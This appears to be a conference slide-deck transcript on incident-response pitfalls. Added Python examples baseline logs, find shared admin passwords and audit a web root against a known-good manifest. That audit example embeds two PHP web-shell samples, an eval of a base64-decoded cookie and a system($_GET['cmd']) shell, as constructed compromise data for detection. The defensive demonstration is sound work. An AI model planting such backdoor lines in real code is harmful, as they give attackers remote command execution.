On information security threats relevant to a developer of information protection tools (СЗИ)
Tech w21
1. Incident Response: How To Give The Advantage To The Hackers
Session ID: TECH-W21
Session Classification: Advanced
James Christiansen, Sands Corporation
Paul Underwood, Emagined Security
2. Focus Of Our Presentation
Giving The Advantage To The Hackers Due To:
ONE: The inability to distinguish what activities are normal for your infrastructure
TWO: Not having all your incident response ducks lined up in a row
THREE: Over-reliance on untested resources
FOUR: Running out of energy before the bad guys do
FIVE: A lack of appreciation for how really difficult it is to stop an ongoing hack attack completely
SIX:
4-6. Giving Hackers The Advantage
THE SCENARIO: We are pretty sure that's normal traffic; at least it looks somewhat familiar.
THE GOTCHA: The old system logs that would help in figuring out what is normal within your infrastructure are not available.
THE FIX: Don't be in a rush to dispose of your old system logs.
7-9. Giving Hackers The Advantage
THE SCENARIO: So, what should we do next? Is this an anomaly that is worth investigating?
THE GOTCHA: Strange things are happening, but you are unable to prioritize your incident response team's activity.
THE FIX: Know what's normal in your infrastructure so anomalous activities stand out.
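The two fixes above (keep the old logs; know what is normal) are one mechanism: retained history is what a baseline is built from, and a baseline is what lets today's oddities be ranked so the team can prioritize. The following is an added example, not code from the presentation or its authors. The connection-summary log format, the sample history and "today" lines, the 10/8 "internal" range and the 00:00-05:59 off-hours window are all constructed assumptions for the example.

```python
"""Baseline "normal" from retained logs, then rank what deviates today.

Added example for slides 6 and 9; not code from the presentation.
Log format (constructed): "<ISO timestamp> <src_host> <dst_ip>:<dst_port> <bytes>".
"""
from collections import defaultdict
from statistics import median

# Constructed history: the "old system logs" the fix says not to throw away.
HISTORY = """\
2012-02-01T09:00:00 web01 10.0.0.5:3306 2100
2012-02-01T09:05:00 web01 10.0.0.5:3306 1900
2012-02-02T10:00:00 web01 10.0.0.5:3306 2300
2012-02-03T10:00:00 web01 10.0.0.5:3306 2000
2012-02-01T09:10:00 web01 10.0.0.9:53 120
2012-02-02T09:10:00 web01 10.0.0.9:53 130
2012-02-01T11:00:00 fin02 10.0.0.7:445 50000
2012-02-02T11:00:00 fin02 10.0.0.7:445 52000
2012-02-03T11:00:00 fin02 10.0.0.7:445 49000
""".splitlines()

# Constructed "today": familiar traffic mixed with things worth a look.
TODAY = """\
2012-02-04T09:00:00 web01 10.0.0.5:3306 2200
2012-02-04T02:13:00 web01 203.0.113.7:443 9800000
2012-02-04T11:00:00 fin02 10.0.0.7:445 51000
2012-02-04T03:40:00 fin02 10.0.0.5:3306 4000
""".splitlines()


def parse(line):
    ts, src, dst, nbytes = line.split()
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {"ts": ts, "src": src, "dst": dst_ip,
            "port": int(dst_port), "bytes": int(nbytes)}


def build_baseline(lines):
    """Per source host: every (dst, port) pair seen and its median byte count."""
    seen = defaultdict(lambda: defaultdict(list))
    for rec in map(parse, lines):
        seen[rec["src"]][(rec["dst"], rec["port"])].append(rec["bytes"])
    return {src: {pair: median(v) for pair, v in pairs.items()}
            for src, pairs in seen.items()}


def score(rec, baseline, volume_factor=10):
    """Score one record against the baseline; 0 means it looks like history."""
    points, reasons = 0, []
    pair = (rec["dst"], rec["port"])
    if rec["src"] not in baseline:
        points += 3
        reasons.append("source host absent from history")
    elif pair not in baseline[rec["src"]]:
        points += 2
        reasons.append("new destination/port for this host")
        if not rec["dst"].startswith("10."):  # assumption: 10/8 is the internal range
            points += 2
            reasons.append("destination outside the internal range")
    elif rec["bytes"] > volume_factor * baseline[rec["src"]][pair]:
        points += 2
        reasons.append(f"{rec['bytes']} bytes vs median {baseline[rec['src']][pair]:.0f}")
    if int(rec["ts"][11:13]) < 6:  # assumption: 00:00-05:59 is off-hours
        points += 1
        reasons.append("off-hours")
    return points, reasons


def rank_anomalies(today, history):
    """[(score, line, reasons)] for every line that deviates, highest score first."""
    baseline = build_baseline(history)
    hits = []
    for line in today:
        points, reasons = score(parse(line), baseline)
        if points:
            hits.append((points, line, reasons))
    return sorted(hits, key=lambda h: -h[0])


if __name__ == "__main__":
    for points, line, reasons in rank_anomalies(TODAY, HISTORY):
        print(points, line, "; ".join(reasons))
    # Without the old logs there is no baseline, so every line is "new" and nothing stands out.
    print(len(rank_anomalies(TODAY, [])), "of", len(TODAY), "lines flagged without history")
```

With history available, only two of the four lines score, and the off-hours transfer to an external host comes out on top; with the history discarded, all four lines are flagged at the same level, which is exactly the "unable to prioritize" gotcha.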
11-13. Giving Hackers The Advantage
THE SCENARIO: We need a special firewall rule written NOW! Get the vendor's expert on the line!
THE GOTCHA: You are unable to find the support phone number for the vendor's expert, and no one else has it either.
THE FIX: Have these "emergency" phone numbers printed out. Treat these folks better than your best friends!
14-16. Giving Hackers The Advantage
THE SCENARIO: You have evidence that Admin-level passwords have been hacked.
THE GOTCHA: The same Admin password is used on numerous critical systems, but no one knows exactly which ones.
THE FIX: Be prepared to change all Admin-level passwords at short notice using a tested process.
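The "tested process" has two halves the slide does not spell out: establishing which systems actually share the compromised password, and rotating each of them to a value that is not shared again. The following is an added example, not code from the presentation or its authors. It assumes you can collect each host's stored admin hash into an inventory; the hash format used here (PBKDF2-SHA256 encoded as `pbkdf2_sha256$<iterations>$<salt hex>$<dk hex>`) and the four-host inventory are constructed for the example. Hashes cannot simply be compared with one another, because every host salts differently, so the known-compromised password is verified against each stored hash instead.

```python
"""Which systems share the compromised admin password, and what to rotate.

Added example for slide 16; not code from the presentation. The inventory and
hash encoding are constructed assumptions for the example.
"""
import hashlib
import hmac
import os
import secrets

ITERATIONS = 100_000


def hash_password(password, salt, iterations=ITERATIONS):
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify(password, stored):
    """Constant-time check of a candidate password against one stored hash."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported hash format: {algo}")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def _constructed_inventory():
    """Constructed CMDB extract: three hosts reuse one admin password, one does not.
    Each host gets its own random salt, as real systems would."""
    shared = "Winter2012!"
    rows = [("db01", 1, shared), ("web01", 2, shared),
            ("hr-files", 1, "s0mething-else"), ("jump01", 1, shared)]
    return [{"host": h, "tier": t, "admin_hash": hash_password(p, os.urandom(16))}
            for h, t, p in rows]


INVENTORY = _constructed_inventory()


def find_exposed(inventory, compromised_password):
    """Hosts whose stored admin hash verifies against the compromised password,
    most critical tier first, so the result doubles as the rotation order."""
    hits = [r for r in inventory if verify(compromised_password, r["admin_hash"])]
    return sorted(hits, key=lambda r: (r["tier"], r["host"]))


def rotation_plan(exposed, length=24):
    """One fresh credential per host; the same value is never issued twice."""
    plan = {}
    for r in exposed:
        new = secrets.token_urlsafe(length)
        while new in plan.values():
            new = secrets.token_urlsafe(length)
        plan[r["host"]] = new
    return plan


if __name__ == "__main__":
    exposed = find_exposed(INVENTORY, "Winter2012!")
    for host, new_pw in rotation_plan(exposed).items():
        print(f"rotate {host}: {new_pw}")
```

Run this before an incident, with the current admin password, and the output of `find_exposed` is the list the gotcha says nobody has.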
17-19. Giving Hackers The Advantage
THE SCENARIO: You need to isolate a network segment, but Marketing says that would kill a pending new product launch.
THE GOTCHA: The inability to isolate segments of the network only further complicates a complex project.
THE FIX: Have a CEO-supported plan for suspending ongoing projects while the incident response effort is underway.
20-22. Giving Hackers The Advantage
THE SCENARIO: The IR Team is asking you for a decision. Unfortunately, the decision requires that you make a LOT of assumptions.
THE GOTCHA: Being forced into a position where you have to start guessing means you no longer have control of the situation.
THE FIX: Run legitimate hacks against your infrastructure to understand what happens; do this before the fact.
23-25. Giving Hackers The Advantage
THE SCENARIO: The hackers own your system. The Webmaster is trying to get "porn links" off the homepage.
THE GOTCHA: The situation is getting a lot worse. Your only option left is to throw in the towel and declare a disaster.
THE FIX: Restore your systems to a known good state and have a tested customer notification plan ready to go.
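"Known good state" only means something if you can tell the live system apart from it. The following is an added example, not code from the presentation or its authors. It models the web root as an in-memory `{path: bytes}` mapping so it runs offline (on a real host the same logic walks the document root), and both file sets, the golden build and the compromised copy, are constructed for the example. It contrasts what the Webmaster is chasing (off-site links in the homepage) with a manifest audit against the known-good copy, which also surfaces the backdoored login page and the dropped shell that removing the links would leave in place.

```python
"""Known-good manifest: see everything that changed, not just the visible links.

Added example for slide 25; not code from the presentation. GOLDEN and LIVE
are constructed file trees.
"""
import hashlib
import re

GOLDEN = {  # what the last clean build or backup looked like
    "index.html": b'<html><body><h1>Acme</h1><a href="/products">Products</a></body></html>',
    "login.php": b"<?php require 'auth.php'; login($_POST['u'], $_POST['p']); ?>",
}

LIVE = {  # the compromised host: injected links, a backdoored login, a dropped shell
    "index.html": (b'<html><body><h1>Acme</h1><a href="/products">Products</a>'
                   b'<div style="display:none"><a href="http://example.net/x">spam</a></div>'
                   b'</body></html>'),
    "login.php": (b"<?php require 'auth.php'; @eval(base64_decode($_COOKIE['c'])); "
                  b"login($_POST['u'], $_POST['p']); ?>"),
    "uploads/.cache.php": b"<?php @system($_GET['cmd']); ?>",
}


def build_manifest(files):
    """path -> sha256 of content, produced from the known-good copy."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def audit(live, manifest):
    """Compare a live tree with the manifest: modified, added and missing paths."""
    live_digests = build_manifest(live)
    return {
        "modified": sorted(p for p in manifest
                           if p in live_digests and live_digests[p] != manifest[p]),
        "added": sorted(p for p in live_digests if p not in manifest),
        "missing": sorted(p for p in manifest if p not in live_digests),
    }


HREF = re.compile(rb'href=["\'](https?://([^/"\']+)[^"\']*)["\']', re.I)


def injected_links(html, allowed_hosts):
    """What the Webmaster is chasing: absolute links to hosts not on the allowlist."""
    return [url.decode() for url, host in HREF.findall(html)
            if host.decode() not in allowed_hosts]


if __name__ == "__main__":
    manifest = build_manifest(GOLDEN)
    print("links the Webmaster sees:", injected_links(LIVE["index.html"], {"acme.example"}))
    print("what actually changed:", audit(LIVE, manifest))
    print("after restoring the golden copy:", audit(GOLDEN, manifest))
```

The manifest has to come from a copy taken before the compromise, which is the same point the deck makes about old logs; a manifest generated from the live host after the fact only tells you what changes next.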
28-29. Giving Hackers The Advantage
THE SCENARIO: Critical evidence is mistakenly deleted; attempts at recovering it have failed.
THE GOTCHA: Not being prepared for the fact that serious blunders will occur at some point in the response.
THE FIX: Above all else, remember that this is a learning process and not an exercise in finding someone to blame.
31-33. Giving Hackers The Advantage
THE SCENARIO: The initial incident response is entering its 3rd day with no end in sight.
THE GOTCHA: Without enough sleep you become part of the problem.
THE FIX: Cut a deal with a nearby hotel for temporary rooms; make 4 hr. sleep breaks mandatory every 18 hours.
36-37. Giving Hackers The Advantage
THE SCENARIO: The hackers may have compromised your VM farm.
THE GOTCHA: The Incident Response team isn't fluent in VM speak, nor is it up on all the VM tools.
THE FIX: Avoid using VMs for mission-critical systems, as they are harder to analyze from a forensic perspective.
39-41. Giving Hackers The Advantage
THE SCENARIO: During the incident response your CEO is clearly not happy with the continued flow of bad news.
THE GOTCHA: Incident response mitigations seldom have any good news during the first 80% of the effort.
THE FIX: Educate management to expect lots of bad news. Bad news means the team understands the issues.
42. How to Apply What You Have Learned
► Within three months, you should:
► Review your incident response plan with the scenarios from this presentation
► Update your contact lists, system inventories and skill assessments
► Beyond three months, you should:
► Obtain specific training for members of your incident response team for areas of weakness you identified during your scenario testing
► Upgrade your staff with experts that can handle a major incident within your organization
► Contract with a Business Recovery Team (BRT) that can assist your organization during a crisis
43. Summary
► for even the best plan
► How to give the advantage to the hackers:
► Not having current contact lists, technical resources or contracted resources to help
► Not having a good relationship with the business so they have confidence in your ability to manage the incident
► Burning out the staff so they make bad decisions
► Not having a trained staff in investigation tools and techniques
► Not being able to make decisions and stay calm
44. Resources Available
► CSIRT Resources (www.cert.org)
Handbook for Computer Security Incident Response Teams
http://www.cert.org/archive/pdf/csirt-handbook.pdf
CSIRT Services
http://www.cert.org/csirts/services.html
Organizational Models for CSIRTs
http://www.cert.org/archive/pdf/03hb001.pdf
State of the Practice for CSIRTs
http://www.cert.org/archive/pdf/03tr001.pdf
Steps for Creating National CSIRTs
http://www.cert.org/archive/pdf/NationalCSIRTs.pdf
Defining Incident Management Processes
http://www.cert.org/archive/pdf/04tr015.pdf
Staffing Your CSIRT
http://www.cert.org/csirts/csirt-staffing.html
► www.sans.org